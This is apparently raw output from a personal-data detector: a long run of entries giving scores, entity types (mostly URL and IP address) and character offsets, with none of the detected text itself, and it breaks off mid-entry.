score: 0.5, type: URL, start: 80738, end: 80745, score: 0.5, type: URL, start: 80817, end: 80824, score: 0.5, type: URL, start: 80838, end: 80845, score: 0.5, type: URL, start: 81120, end: 81127, score: 0.5, type: URL, start: 81141, end: 81148, score: 0.5, type: URL, start: 81433, end: 81440, score: 0.5, type: URL, start: 81607, end: 81614, score: 0.5, type: URL, start: 81627, end: 81634, score: 0.5, type: URL, start: 81780, end: 81787, score: 0.5, type: URL, start: 81798, end: 81805, score: 0.5, type: URL, start: 81838, end: 81850, score: 0.5, type: URL, start: 81935, end: 81942, score: 0.5, type: URL, start: 81946, end: 81958, score: 0.5, type: URL, start: 81972, end: 81979, score: 0.5, type: URL, start: 81995, end: 82002, score: 0.5, type: URL, start: 82045, end: 82057, score: 0.5, type: URL, start: 82147, end: 82154, score: 0.5, type: URL, start: 82166, end: 82173, score: 0.5, type: URL, start: 82212, end: 82224, score: 0.5, type: URL, start: 82310, end: 82317, score: 0.5, type: URL, start: 82329, end: 82336, score: 0.5, type: URL, start: 82375, end: 82387, score: 0.5, type: URL, start: 82500, end: 82507, score: 0.5, type: URL, start: 82667, end: 82674, score: 0.5, type: URL, start: 82699, end: 82706, score: 0.5, type: URL, start: 82816, end: 82828, score: 0.5, type: URL, start: 83022, end: 83029, score: 0.5, type: URL, start: 83032, end: 83044, score: 0.5, type: URL, start: 83056, end: 83063, score: 0.5, type: URL, start: 83241, end: 83253, score: 0.5, type: URL, start: 83296, end: 83308, score: 0.5, type: URL, start: 83396, end: 83408, score: 0.5, type: URL, start: 83634, end: 83644, score: 0.5, type: URL, start: 83797, end: 83807, score: 0.5, type: URL, start: 83843, end: 83853, score: 0.5, type: URL, start: 84445, end: 84452, score: 0.5, type: URL, start: 84486, end: 84493, score: 0.5, type: URL, start: 84569, end: 84576, score: 0.5, type: URL, start: 84610, end: 84617, score: 0.5, type: URL, start: 84750, end: 84761, score: 0.5, type: URL, start: 84869, end: 84881, score: 0.5, type: URL, start: 84905, end: 84912, score: 0.5, type: URL, start: 85064, end: 85071, score: 0.5, type: URL, start: 85106, end: 85113, score: 0.5, type: URL, start: 85169, end: 85176, score: 0.5, type: URL, start: 85324, end: 85331, score: 0.5, type: URL, start: 85471, end: 85478, score: 0.5, type: URL, start: 85562, end: 85574, score: 0.5, type: URL, start: 86336, end: 86343, score: 0.5, type: URL, start: 86351, end: 86358, score: 0.5, type: URL, start: 87197, end: 87207, score: 0.5, type: URL, start: 87325, end: 87337, score: 0.5, type: URL, start: 87432, end: 87441, score: 0.5, type: URL, start: 87492, end: 87502, score: 0.5, type: URL, start: 87654, end: 87663, score: 0.5, type: URL, start: 87874, end: 87884, score: 0.5, type: URL, start: 87916, end: 87954, score: 0.5, type: URL, start: 87991, end: 87998, score: 0.5, type: URL, start: 88127, end: 88134, score: 0.5, type: URL, start: 88148, end: 88155, score: 0.5, type: URL, start: 88170, end: 88177, score: 0.5, type: URL, start: 88200, end: 88207, score: 0.5, type: URL, start: 88266, end: 88273, score: 0.5, type: URL, start: 88733, end: 88744, score: 0.5, type: URL, start: 88850, end: 88857, score: 0.5, type: URL, start: 88873, end: 88880, score: 0.5, type: URL, start: 89181, end: 89188, score: 0.5, type: URL, start: 89191, end: 89203, score: 0.5, type: URL, start: 89215, end: 89222, score: 0.5, type: URL, start: 89406, end: 89413, score: 0.5, type: URL, start: 89488, end: 89496, score: 0.5, type: URL, start: 89569, end: 89579, score: 0.5, type: URL, start: 89612, end: 89618, score: 0.5, type: URL, start: 89670, end: 89680, score: 0.5, type: URL, start: 89692, end: 89698, score: 0.5, type: URL, start: 89713, end: 89719, score: 0.5, type: URL, start: 90102, end: 90113, score: 0.5, type: URL, start: 90381, end: 90388, score: 0.5, type: URL, start: 90404, end: 90411, score: 0.5, type: URL, start: 90499, end: 90506, score: 0.5, type: URL, start: 90524, end: 90531, score: 0.5, type: URL, start: 90757, end: 90764, score: 0.5, type: URL, start: 90769, end: 90776, score: 0.5, type: URL, start: 90785, end: 90792, score: 0.5, type: URL, start: 90961, end: 90968, score: 0.5, type: URL, start: 91241, end: 91252, score: 0.5, type: URL, start: 91358, end: 91365, score: 0.5, type: URL, start: 91381, end: 91388, score: 0.5, type: URL, start: 91633, end: 91640, score: 0.5, type: URL, start: 91643, end: 91655, score: 0.5, type: URL, start: 91667, end: 91674, score: 0.5, type: URL, start: 92204, end: 92215, score: 0.5, type: URL, start: 92321, end: 92328, score: 0.5, type: URL, start: 92344, end: 92351, score: 0.5, type: URL, start: 92649, end: 92656, score: 0.5, type: URL, start: 92935, end: 92946, score: 0.5, type: URL, start: 93052, end: 93059, score: 0.5, type: URL, start: 93075, end: 93082, score: 0.5, type: URL, start: 93383, end: 93390, score: 0.5, type: URL, start: 93680, end: 93691, score: 0.5, type: URL, start: 93797, end: 93804, score: 0.5, type: URL, start: 93820, end: 93827, score: 0.5, type: URL, start: 94164, end: 94171, score: 0.5, type: URL, start: 94451, end: 94462, score: 0.5, type: URL, start: 94568, end: 94575, score: 0.5, type: URL, start: 94591, end: 94598, score: 0.5, type: URL, start: 94900, end: 94907, score: 0.5, type: URL, start: 95182, end: 95193, score: 0.5, type: URL, start: 95373, end: 95380, score: 0.5, type: URL, start: 95396, end: 95403, score: 0.5, type: URL, start: 95491, end: 95498, score: 0.5, type: URL, start: 95510, end: 95517, score: 0.5, type: URL, start: 95736, end: 95743, score: 0.5, type: URL, start: 95747, end: 95754, score: 0.5, type: URL, start: 95763, end: 95770, score: 0.5, type: URL, start: 95916, end: 95923, score: 0.5, type: URL, start: 95949, end: 95956, score: 0.5, type: URL, start: 96223, end: 96234, score: 0.5, type: URL, start: 96340, end: 96347, score: 0.5, type: URL, start: 96363, end: 96370, score: 0.5, type: URL, start: 96611, end: 96618, score: 0.5, type: URL, start: 96624, end: 96631, score: 0.5, type: URL, start: 96795, end: 96802, score: 0.5, type: URL, start: 97075, end: 97086, score: 0.5, type: URL, start: 97276, end: 97283, score: 0.5, type: URL, start: 97299, end: 97306, score: 0.5, type: URL, start: 97394, end: 97401, score: 0.5, type: URL, start: 97412, end: 97419, score: 0.5, type: URL, start: 97659, end: 97666, score: 0.5, type: URL, start: 97669, end: 97681, score: 0.5, type: URL, start: 97693, end: 97700, score: 0.5, type: URL, start: 97863, end: 97870, score: 0.5, type: URL, start: 97912, end: 97917, score: 0.5, type: URL, start: 98042, end: 98049, score: 0.5, type: URL, start: 98102, end: 98107, score: 0.5, type: URL, start: 98233, end: 98240, score: 0.5, type: URL, start: 98737, end: 98748, score: 0.5, type: URL, start: 98907, end: 98914, score: 0.5, type: URL, start: 98930, end: 98937, score: 0.5, type: URL, start: 99025, end: 99032, score: 0.5, type: URL, start: 99045, end: 99052, score: 0.5, type: URL, start: 99299, end: 99306, score: 0.5, type: URL, start: 99309, end: 99321, score: 0.5, type: URL, start: 99333, end: 99340, score: 0.5, type: URL, start: 99503, end: 99510, score: 0.5, type: URL, start: 99553, end: 99558, score: 0.5, type: URL, start: 99726, end: 99733, score: 0.5, type: URL, start: 100027, end: 100037, score: 0.5, type: URL, start: 100117, end: 100141, score: 0.5, type: URL, start: 100191, end: 100203, score: 0.5, type: URL, start: 100237, end: 100243, score: 0.5, type: URL, start: 100251, end: 100258, score: 0.5, type: URL, start: 100302, end: 100326, score: 0.5, type: URL, start: 100794, end: 100799, score: 0.5, type: URL, start: 100974, end: 100981, score: 0.5, type: URL, start: 100990, end: 100997, score: 0.5, type: URL, start: 101484, end: 101494, score: 0.5, type: URL, start: 101574, end: 101598, score: 0.5, type: URL, start: 101648, end: 101660, score: 0.5, type: URL, start: 101694, end: 101700, score: 0.5, type: URL, start: 101708, end: 101715, score: 0.5, type: URL, start: 101759, end: 101783, score: 0.5, type: URL, start: 102412, end: 102423, score: 0.5, type: URL, start: 102665, end: 102672, score: 0.5, type: URL, start: 102688, end: 102695, score: 0.5, type: URL, start: 102942, end: 102949, score: 0.5, type: URL, start: 102963, end: 102970, score: 0.5, type: URL, start: 103068, end: 103075, score: 0.5, type: URL, start: 103089, end: 103096, score: 0.5, type: URL, start: 103371, end: 103378, score: 0.5, type: URL, start: 103392, end: 103399, score: 0.5, type: URL, start: 103922, end: 103929, score: 0.5, type: URL, start: 103932, end: 103944, score: 0.5, type: URL, start: 103956, end: 103963, score: 0.5, type: URL, start: 104097, end: 104107, score: 0.5, type: URL, start: 104143, end: 104153, score: 0.5, type: URL, start: 104745, end: 104752, score: 0.5, type: URL, start: 104786, end: 104793, score: 0.5, type: URL, start: 104869, end: 104876, score: 0.5, type: URL, start: 104910, end: 104917, score: 0.5, type: URL, start: 105050, end: 105061, score: 0.5, type: URL, start: 105218, end: 105224, score: 0.5, type: URL, start: 105571, end: 105582, score: 0.5, type: URL, start: 105688, end: 105695, score: 0.5, type: URL, start: 105711, end: 105718, score: 0.5, type: URL, start: 105969, end: 105976, score: 0.5, type: URL, start: 105979, end: 105991, score: 0.5, type: URL, start: 106003, end: 106010, score: 0.5, type: URL, start: 106511, end: 106521, score: 0.5, type: URL, start: 106532, end: 106542, score: 0.5, type: URL, start: 106648, end: 106658, score: 0.5, type: URL, start: 106869, end: 106879, score: 0.5, type: URL, start: 106888, end: 106898, score: 0.5, type: URL, start: 107011, end: 107021, score: 0.5, type: URL, start: 107186, end: 107191, score: 0.5, type: URL, start: 107307, end: 107314, score: 0.5, type: URL, start: 107571, end: 107581, score: 0.5, type: URL, start: 107592, end: 107602, score: 0.5, type: URL, start: 107776, end: 107786, score: 0.5, type: URL, start: 107795, end: 107805, score: 0.5, type: URL, start: 110442, end: 110453, score: 0.5, type: URL, start: 110559, end: 110566, score: 0.5, type: URL, start: 110582, end: 110589, score: 0.5, type: URL, start: 110826, end: 110833, score: 0.5, type: URL, start: 110836, end: 110848, score: 0.5, type: URL, start: 110860, end: 110867, score: 0.5, type: URL, start: 110995, end: 111026, score: 0.5, type: URL, start: 111138, end: 111144, score: 0.5, type: URL, start: 111298, end: 111307, score: 0.5, type: URL, start: 111392, end: 111398, score: 0.5, type: URL, start: 111789, end: 111796, score: 0.5, type: URL, start: 111807, end: 111814, score: 0.5, type: URL, start: 111894, end: 111901, score: 0.5, type: URL, start: 111914, end: 111921, score: 0.5, type: URL, start: 112161, end: 112173, score: 0.5, type: URL, start: 112201, end: 112208, score: 0.5, type: URL, start: 112217, end: 112227, score: 0.5, type: URL, start: 112388, end: 112398, score: 0.5, type: URL, start: 112483, end: 112493, score: 0.5, type: URL, start: 112592, end: 112602, score: 0.5, type: URL, start: 112644, end: 112654, score: 0.5, type: URL, start: 112748, end: 112758, score: 0.5, type: URL, start: 112793, end: 112803, score: 0.5, type: URL, start: 112882, end: 112893, score: 0.5, type: URL, start: 112928, end: 112938, score: 0.5, type: URL, start: 112968, end: 112978, score: 0.5, type: URL, start: 113020, end: 113030, score: 0.5, type: URL, start: 113070, end: 113080, score: 0.5, type: URL, start: 113085, end: 113095, score: 0.5, type: URL, start: 113159, end: 113183, score: 0.5, type: URL, start: 113229, end: 113241, score: 0.5, type: URL, start: 113255, end: 113265, score: 0.5, type: URL, start: 113274, end: 113284, score: 0.5, type: URL, start: 113358, end: 113382, score: 0.5, type: URL, start: 113560, end: 113570, score: 0.5, type: URL, start: 113692, end: 113699, score: 0.5, type: URL, start: 113735, end: 113745, score: 0.5, type: URL, start: 113801, end: 113811, score: 0.5, type: URL, start: 114958, end: 114968, score: 0.5, type: URL, start: 114999, end: 115009, score: 0.5, type: URL, start: 115046, end: 115056, score: 0.5, type: URL, start: 115158, end: 115168, score: 0.5, type: URL, start: 115197, end: 115207, score: 0.5, type: URL, start: 115371, end: 115376, score: 0.5, type: URL, start: 115417, end: 115422, score: 0.5, type: URL, start: 115467, end: 115472, score: 0.5, type: URL, start: 115521, end: 115526, score: 0.5, type: URL, start: 115573, end: 115578, score: 0.5, type: URL, start: 115621, end: 115626, score: 0.5, type: URL, start: 115669, end: 115674, score: 0.5, type: URL, start: 115717, end: 115722, score: 0.5, type: URL, start: 115801, end: 115806, score: 0.5, type: URL, start: 115841, end: 115846, score: 0.5, type: URL, start: 115895, end: 115900, score: 0.5, type: URL, start: 115941, end: 115946, score: 0.5, type: URL, start: 115991, end: 115996, score: 0.5, type: URL, start: 116077, end: 116082, score: 0.5, type: URL, start: 116141, end: 116148, score: 0.5, type: URL, start: 116186, end: 116193, score: 0.5, type: URL, start: 116221, end: 116228, score: 0.5, type: URL, start: 116254, end: 116261, score: 0.5, type: URL, start: 116289, end: 116296, score: 0.5, type: URL, start: 116332, end: 116339, score: 0.5, type: URL, start: 116373, end: 116380, score: 0.5, type: URL, start: 116414, end: 116421, score: 0.5, type: URL, start: 116465, end: 116472, score: 0.5, type: URL, start: 116506, end: 116513, score: 0.5, type: URL, start: 116539, end: 116546, score: 0.5, type: URL, start: 116576, end: 116583, score: 0.5, type: URL, start: 116619, end: 116626, score: 0.5, type: URL, start: 116656, end: 116663, score: 0.5, type: URL, start: 116699, end: 116706, score: 0.5, type: URL, start: 116791, end: 116799, score: 0.5, type: DATE_TIME, start: 6006, end: 6053, score: 0.85, type: IP_ADDRESS, start: 335, end: 347, score: 0.6, type: IP_ADDRESS, start: 354, end: 363, score: 0.6, type: IP_ADDRESS, start: 364, end: 373, score: 0.6, type: IP_ADDRESS, start: 409, end: 418, score: 0.6, type: IP_ADDRESS, start: 1477, end: 1486, score: 0.6, type: IP_ADDRESS, start: 1544, end: 1553, score: 0.6, type: IP_ADDRESS, start: 1689, end: 1698, score: 0.6, type: IP_ADDRESS, start: 2092, end: 2101, score: 0.6, type: IP_ADDRESS, start: 2204, end: 2213, score: 0.6, type: IP_ADDRESS, start: 2677, end: 2686, score: 0.6, type: IP_ADDRESS, start: 2824, end: 2833, score: 0.6, type: IP_ADDRESS, start: 3124, end: 3133, score: 0.6, type: IP_ADDRESS, start: 3350, end: 3362, score: 0.6, type: IP_ADDRESS, start: 3369, end: 3378, score: 0.6, type: IP_ADDRESS, start: 3379, end: 3388, score: 0.6, type: IP_ADDRESS, start: 3424, end: 3433, score: 0.6, type: IP_ADDRESS, start: 4492, end: 4501, score: 0.6, type: IP_ADDRESS, start: 4559, end: 4568, score: 0.6, type: IP_ADDRESS, start: 4704, end: 4713, score: 0.6, type: IP_ADDRESS, start: 5104, end: 5113, score: 0.6, type: IP_ADDRESS, start: 5216, end: 5225, score: 0.6, type: IP_ADDRESS, start: 5717, end: 5726, score: 0.6, type: IP_ADDRESS, start: 6115, end: 6127, score: 0.6, type: IP_ADDRESS, start: 6134, end: 6143, score: 0.6, type: IP_ADDRESS, start: 6144, end: 6153, score: 0.6, type: IP_ADDRESS, start: 6189, end: 6198, score: 0.6, type: IP_ADDRESS, start: 7258, end: 7267, score: 0.6, type: IP_ADDRESS, start: 7325, end: 7334, score: 0.6, type: IP_ADDRESS, start: 7470, end: 7479, score: 0.6, type: IP_ADDRESS, start: 7873, end: 7882, score: 0.6, type: IP_ADDRESS, start: 7985, end: 7994, score: 0.6, type: IP_ADDRESS, start: 8523, end: 8532, score: 0.6, type: IP_ADDRESS, start: 8920, end: 8932, score: 0.6, type: IP_ADDRESS, start: 8939, end: 8948, score: 0.6, type: IP_ADDRESS, start: 8949, end: 8958, score: 0.6, type: IP_ADDRESS, start: 8994, end: 9003, score: 0.6, type: IP_ADDRESS, start: 10062, end: 10071, score: 0.6, type: IP_ADDRESS, start: 10129, end: 10138, score: 0.6, type: IP_ADDRESS, start: 10274, end: 10283, score: 0.6, type: IP_ADDRESS, start: 10677, end: 10686, score: 0.6, type: IP_ADDRESS, start: 10789, end: 10798, score: 0.6, type: IP_ADDRESS, start: 11262, end: 11271, score: 0.6, type: IP_ADDRESS, start: 11409, end: 11418, score: 0.6, type: IP_ADDRESS, start: 11709, end: 11718, score: 0.6, type: IP_ADDRESS, start: 11903, end: 11915, score: 0.6, type: IP_ADDRESS, start: 11922, end: 11931, score: 0.6, type: IP_ADDRESS, start: 11932, end: 11941, score: 0.6, type: IP_ADDRESS, start: 11977, end: 11986, score: 0.6, type: IP_ADDRESS, start: 12717, end: 12726, score: 0.6, type: IP_ADDRESS, start: 12864, end: 12873, score: 0.6, type: IP_ADDRESS, start: 13164, end: 13173, score: 0.6, type: IP_ADDRESS, start: 13463, end: 13472, score: 0.6, type: IP_ADDRESS, start: 13530, end: 13539, score: 0.6, type: IP_ADDRESS, start: 13675, end: 13684, score: 0.6, type: IP_ADDRESS, start: 14078, end: 14087, score: 0.6, type: IP_ADDRESS, start: 14190, end: 14199, score: 0.6, type: IP_ADDRESS, start: 14663, end: 14672, score: 0.6, type: IP_ADDRESS, start: 14810, end: 14819, score: 0.6, type: IP_ADDRESS, start: 15110, end: 15119, score: 0.6, type: IP_ADDRESS, start: 15336, end: 15348, score: 0.6, type: IP_ADDRESS, start: 15355, end: 15364, score: 0.6, type: IP_ADDRESS, start: 15365, end: 15374, score: 0.6, type: IP_ADDRESS, start: 15410, end: 15419, score: 0.6, type: IP_ADDRESS, start: 16771, end: 16780, score: 0.6, type: IP_ADDRESS, start: 16838, end: 16847, score: 0.6, type: IP_ADDRESS, start: 17054, end: 17063, score: 0.6, type: IP_ADDRESS, start: 17462, end: 17471, score: 0.6, type: IP_ADDRESS, start: 17574, end: 17583, score: 0.6, type: IP_ADDRESS, start: 18057, end: 18066, score: 0.6, type: IP_ADDRESS, start: 18475, end: 18484, score: 0.6, type: IP_ADDRESS, start: 18542, end: 18551, score: 0.6, type: IP_ADDRESS, start: 18758, end: 18767, score: 0.6, type: IP_ADDRESS, start: 19166, end: 19175, score: 0.6, type: IP_ADDRESS, start: 19278, end: 19287, score: 0.6, type: IP_ADDRESS, start: 19761, end: 19770, score: 0.6, type: IP_ADDRESS, start: 20059, end: 20071, score: 0.6, type: IP_ADDRESS, start: 20078, end: 20087, score: 0.6, type: IP_ADDRESS, start: 20088, end: 20097, score: 0.6, type: IP_ADDRESS, start: 20133, end: 20142, score: 0.6, type: IP_ADDRESS, start: 20993, end: 21002, score: 0.6, type: IP_ADDRESS, start: 21504, end: 21513, score: 0.6, type: IP_ADDRESS, start: 22006, end: 22015, score: 0.6, type: IP_ADDRESS, start: 22073, end: 22082, score: 0.6, type: IP_ADDRESS, start: 22289, end: 22298, score: 0.6, type: IP_ADDRESS, start: 22697, end: 22706, score: 0.6, type: IP_ADDRESS, start: 22809, end: 22818, score: 0.6, type: IP_ADDRESS, start: 23292, end: 23301, score: 0.6, type: IP_ADDRESS, start: 23444, end: 23453, score: 0.6, type: IP_ADDRESS, start: 23749, end: 23758, score: 0.6, type: IP_ADDRESS, start: 24101, end: 24110, score: 0.6, type: IP_ADDRESS, start: 24168, end: 24177, score: 0.6, type: IP_ADDRESS, start: 24384, end: 24393, score: 0.6, type: IP_ADDRESS, start: 24792, end: 24801, score: 0.6, type: IP_ADDRESS, start: 24904, end: 24913, score: 0.6, type: IP_ADDRESS, start: 25387, end: 25396, score: 0.6, type: IP_ADDRESS, start: 25539, end: 25548, score: 0.6, type: IP_ADDRESS, start: 25844, end: 25853, score: 0.6, type: IP_ADDRESS, start: 26224, end: 26233, score: 0.6, type: IP_ADDRESS, start: 26291, end: 26300, score: 0.6, type: IP_ADDRESS, start: 26507, end: 26516, score: 0.6, type: IP_ADDRESS, start: 26915, end: 26924, score: 0.6, type: IP_ADDRESS, start: 27027, end: 27036, score: 0.6, type: IP_ADDRESS, start: 27564, end: 27573, score: 0.6, type: IP_ADDRESS, start: 27716, end: 27725, score: 0.6, type: IP_ADDRESS, start: 28021, end: 28030, score: 0.6, type: IP_ADDRESS, start: 28362, end: 28371, score: 0.6, type: IP_ADDRESS, start: 28783, end: 28795, score: 0.6, type: IP_ADDRESS, start: 28802, end: 28811, score: 0.6, type: IP_ADDRESS, start: 28812, end: 28821, score: 0.6, type: IP_ADDRESS, start: 28857, end: 28866, score: 0.6, type: IP_ADDRESS, start: 29997, end: 30006, score: 0.6, type: IP_ADDRESS, start: 30064, end: 30073, score: 0.6, type: IP_ADDRESS, start: 30209, end: 30218, score: 0.6, type: IP_ADDRESS, start: 30553, end: 30562, score: 0.6, type: IP_ADDRESS, start: 30665, end: 30674, score: 0.6, type: IP_ADDRESS, start: 31138, end: 31147, score: 0.6, type: IP_ADDRESS, start: 31285, end: 31294, score: 0.6, type: IP_ADDRESS, start: 31585, end: 31594, score: 0.6, type: IP_ADDRESS, start: 31799, end: 31811, score: 0.6, type: IP_ADDRESS, start: 31818, end: 31827, score: 0.6, type: IP_ADDRESS, start: 31828, end: 31837, score: 0.6, type: IP_ADDRESS, start: 31873, end: 31882, score: 0.6, type: IP_ADDRESS, start: 32728, end: 32737, score: 0.6, type: IP_ADDRESS, start: 33197, end: 33206, score: 0.6, type: IP_ADDRESS, start: 33264, end: 33273, score: 0.6, type: IP_ADDRESS, start: 33409, end: 33418, score: 0.6, type: IP_ADDRESS, start: 33753, end: 33762, score: 0.6, type: IP_ADDRESS, start: 33865, end: 33874, score: 0.6, type: IP_ADDRESS, start: 34119, end: 34128, score: 0.6, type: IP_ADDRESS, start: 34419, end: 34428, score: 0.6, type: IP_ADDRESS, start: 34886, end: 34898, score: 0.6, type: IP_ADDRESS, start: 34905, end: 34914, score: 0.6, type: IP_ADDRESS, start: 34915, end: 34924, score: 0.6, type: IP_ADDRESS, start: 34960, end: 34969, score: 0.6, type: IP_ADDRESS, start: 35816, end: 35825, score: 0.6, type: IP_ADDRESS, start: 36285, end: 36294, score: 0.6, type: IP_ADDRESS, start: 36352, end: 36361, score: 0.6, type: IP_ADDRESS, start: 36497, end: 36506, score: 0.6, type: IP_ADDRESS, start: 36841, end: 36850, score: 0.6, type: IP_ADDRESS, start: 36953, end: 36962, score: 0.6, type: IP_ADDRESS, start: 37240, end: 37249, score: 0.6, type: IP_ADDRESS, start: 37879, end: 37891, score: 0.6, type: IP_ADDRESS, start: 37898, end: 37907, score: 0.6, type: IP_ADDRESS, start: 37908, end: 37917, score: 0.6, type: IP_ADDRESS, start: 37953, end: 37962, score: 0.6, type: IP_ADDRESS, start: 39089, end: 39098, score: 0.6, type: IP_ADDRESS, start: 39156, end: 39165, score: 0.6, type: IP_ADDRESS, start: 39301, end: 39310, score: 0.6, type: IP_ADDRESS, start: 39704, end: 39713, score: 0.6, type: IP_ADDRESS, start: 39816, end: 39825, score: 0.6, type: IP_ADDRESS, start: 40070, end: 40079, score: 0.6, type: IP_ADDRESS, start: 40370, end: 40379, score: 0.6, type: IP_ADDRESS, start: 40676, end: 40685, score: 0.6, type: URL, start: 135, end: 144, score: 0.5, type: URL, start: 151, end: 160, score: 0.5, type: URL, start: 169, end: 183, score: 0.5, type: URL, start: 189, end: 203, score: 0.5, type: URL, start: 308, end: 318, score: 0.5, type: URL, start: 384, end: 394, score: 0.5, type: URL, start: 438, end: 448, score: 0.5, type: URL, start: 502, end: 512, score: 0.5, type: URL, start: 570, end: 580, score: 0.5, type: URL, start: 624, end: 635, score: 0.5, type: URL, start: 646, end: 656, score: 0.5, type: URL, start: 672, end: 688, score: 0.5, type: URL, start: 713, end: 723, score: 0.5, type: URL, start: 739, end: 760, score: 0.5, type: URL, start: 833, end: 843, score: 0.5, type: URL, start: 879, end: 889, score: 0.5, type: URL, start: 918, end: 928, score: 0.5, type: URL, start: 1014, end: 1033, score: 0.5, type: URL, start: 1055, end: 1061, score: 0.5, type: URL, start: 1088, end: 1095, score: 0.5, type: URL, start: 1117, end: 1123, score: 0.5, type: URL, start: 1239, end: 1245, score: 0.5, type: URL, start: 1277, end: 1283, score: 0.5, type: URL, start: 1314, end: 1321, score: 0.5, type: URL, start: 1343, end: 1349, score: 0.5, type: URL, start: 1394, end: 1400, score: 0.5, type: URL, start: 1439, end: 1445, score: 0.5, type: URL, start: 1497, end: 1503, score: 0.5, type: URL, start: 1591, end: 1597, score: 0.5, type: URL, start: 1635, end: 1641, score: 0.5, type: URL, start: 1709, end: 1715, score: 0.5, type: URL, start: 1747, end: 1753, score: 0.5, type: URL, start: 1800, end: 1819, score: 0.5, type: URL, start: 1831, end: 1837, score: 0.5, type: URL, start: 1890, end: 1896, score: 0.5, type: URL, start: 1940, end: 1946, score: 0.5, type: URL, start: 1976, end: 1983, score: 0.5, type: URL, start: 2005, end: 2011, score: 0.5, type: URL, start: 2054, end: 2060, score: 0.5, type: URL, start: 2112, end: 2118, score: 0.5, type: URL, start: 2157, end: 2163, score: 0.5, type: URL, start: 2224, end: 2230, score: 0.5, type: URL, start: 2270, end: 2276, score: 0.5, type: URL, start: 2328, end: 2334, score: 0.5, type: URL, start: 2375, end: 2394, score: 0.5, type: URL, start: 2458, end: 2477, score: 0.5, type: URL, start: 2499, end: 2505, score: 0.5, type: URL, start: 2532, end: 2539, score: 0.5, type: URL, start: 2561, end: 2567, score: 0.5, type: URL, start: 2741, end: 2760, score: 0.5, type: URL, start: 2824, end: 2844, score: 0.5, type: URL, start: 2871, end: 2877, score: 0.5, type: URL, start: 2904, end: 2911, score: 0.5, type: URL, start: 2933, end: 2939, score: 0.5, type: URL, start: 3049, end: 3068, score: 0.5, type: URL, start: 3124, end: 3144, score: 0.5, type: URL, start: 3153, end: 3162, score: 0.5, type: URL, start: 3169, end: 3178, score: 0.5, type: URL, start: 3187, end: 3201, score: 0.5, type: URL, start: 3207, end: 3221, score: 0.5, type: URL, start: 3323, end: 3333, score: 0.5, type: URL, start: 3399, end: 3409, score: 0.5, type: URL, start: 3453, end: 3463, score: 0.5, type: URL, start: 3517, end: 3527, score: 0.5, type: URL, start: 3585, end: 3595, score: 0.5, type: URL, start: 3639, end: 3650, score: 0.5, type: URL, start: 3661, end: 3671, score: 0.5, type: URL, start: 3687, end: 3703, score: 0.5, type: URL, start: 3728, end: 3738, score: 0.5, type: URL, start: 3754, end: 3775, score: 0.5, type: URL, start: 3848, end: 3858, score: 0.5, type: URL, start: 3894, end: 3904, score: 0.5, type: URL, start: 3933, end: 3943, score: 0.5, type: URL, start: 4029, end: 4048, score: 0.5, type: URL, start: 4070, end: 4076, score: 0.5, type: URL, start: 4103, end: 4110, score: 0.5, type: URL, start: 4132, end: 4138, score: 0.5, type: URL, start: 4254, end: 4260, score: 0.5, type: URL, start: 4292, end: 4298, score: 0.5, type: URL, start: 4329, end: 4336, score: 0.5, type: URL, start: 4358, end: 4364, score: 0.5, type: URL, start: 4409, end: 4415, score: 0.5, type: URL, start: 4454, end: 4460, score: 0.5, type: URL, start: 4512, end: 4518, score: 0.5, type: URL, start: 4606, end: 4612, score: 0.5, type: URL, start: 4650, end: 4656, score: 0.5, type: URL, start: 4724, end: 4730, score: 0.5, type: URL, start: 4762, end: 4768, score: 0.5, type: URL, start: 4815, end: 4831, score: 0.5, type: URL, start: 4843, end: 4849, score: 0.5, type: URL, start: 4902, end: 4908, score: 0.5, type: URL, start: 4952, end: 4958, score: 0.5, type: URL, start: 4988, end: 4995, score: 0.5, type: URL, start: 5017, end: 5023, score: 0.5, type: URL, start: 5066, end: 5072, score: 0.5, type: URL, start: 5124, end: 5130, score: 0.5, type: URL, start: 5169, end: 5175, score: 0.5, type: URL, start: 5236, end: 5242, score: 0.5, type: URL, start: 5282, end: 5288, score: 0.5, type: URL, start: 5340, end: 5346, score: 0.5, type: URL, start: 5387, end: 5403, score: 0.5, type: URL, start: 5467, end: 5486, score: 0.5, type: URL, start: 5508, end: 5514, score: 0.5, type: URL, start: 5541, end: 5548, score: 0.5, type: URL, start: 5570, end: 5576, score: 0.5, type: URL, start: 5717, end: 5737, score: 0.5, type: URL, start: 5764, end: 5770, score: 0.5, type: URL, start: 5797, end: 5804, score: 0.5, type: URL, start: 5826, end: 5832, score: 0.5, type: URL, start: 5916, end: 5925, score: 0.5, type: URL, start: 5932, end: 5941, score: 0.5, type: URL, start: 5950, end: 5964, score: 0.5, type: URL, start: 5970, end: 5984, score: 0.5, type: URL, start: 6088, end: 6098, score: 0.5, type: URL, start: 6164, end: 6174, score: 0.5, type: URL, start: 6218, end: 6228, score: 0.5, type: URL, start: 6283, end: 6293, score: 0.5, type: URL, start: 6351, end: 6361, score: 0.5, type: URL, start: 6405, end: 6416, score: 0.5, type: URL, start: 6427, end: 6437, score: 0.5, type: URL, start: 6453, end: 6469, score: 0.5, type: URL, start: 6494, end: 6504, score: 0.5, type: URL, start: 6520, end: 6541, score: 0.5, type: URL, start: 6614, end: 6624, score: 0.5, type: URL, start: 6660, end: 6670, score: 0.5, type: URL, start: 6699, end: 6709, score: 0.5, type: URL, start: 6795, end: 6814, score: 0.5, type: URL, start: 6836, end: 6842, score: 0.5, type: URL, start: 6869, end: 6876, score: 0.5, type: URL, start: 6898, end: 6904, score: 0.5, type: URL, start: 7020, end: 7026, score: 0.5, type: URL, start: 7058, end: 7064, score: 0.5, type: URL, start: 7095, end: 7102, score: 0.5, type: URL, start: 7124, end: 7130, score: 0.5, type: URL, start: 7175, end: 7181, score: 0.5, type: URL, start: 7220, end: 7226, score: 0.5, type: URL, start: 7278, end: 7284, score: 0.5, type: URL, start: 7372, end: 7378, score: 0.5, type: URL, start: 7416, end: 7422, score: 0.5, type: URL, start: 7490, end: 7496, score: 0.5, type: URL, start: 7528, end: 7534, score: 0.5, type: URL, start: 7581, end: 7600, score: 0.5, type: URL, start: 7612, end: 7618, score: 0.5, type: URL, start: 7671, end: 7677, score: 0.5, type: URL, start: 7721, end: 7727, score: 0.5, type: URL, start: 7757, end: 7764, score: 0.5, type: URL, start: 7786, end: 7792, score: 0.5, type: URL, start: 7835, end: 7841, score: 0.5, type: URL, start: 7893, end: 7899, score: 0.5, type: URL, start: 7938, end: 7944, score: 0.5, type: URL, start: 8005, end: 8011, score: 0.5, type: URL, start: 8143, end: 8149, score: 0.5, type: URL, start: 8190, end: 8209, score: 0.5, type: URL, start: 8273, end: 8292, score: 0.5, type: URL, start: 8314, end: 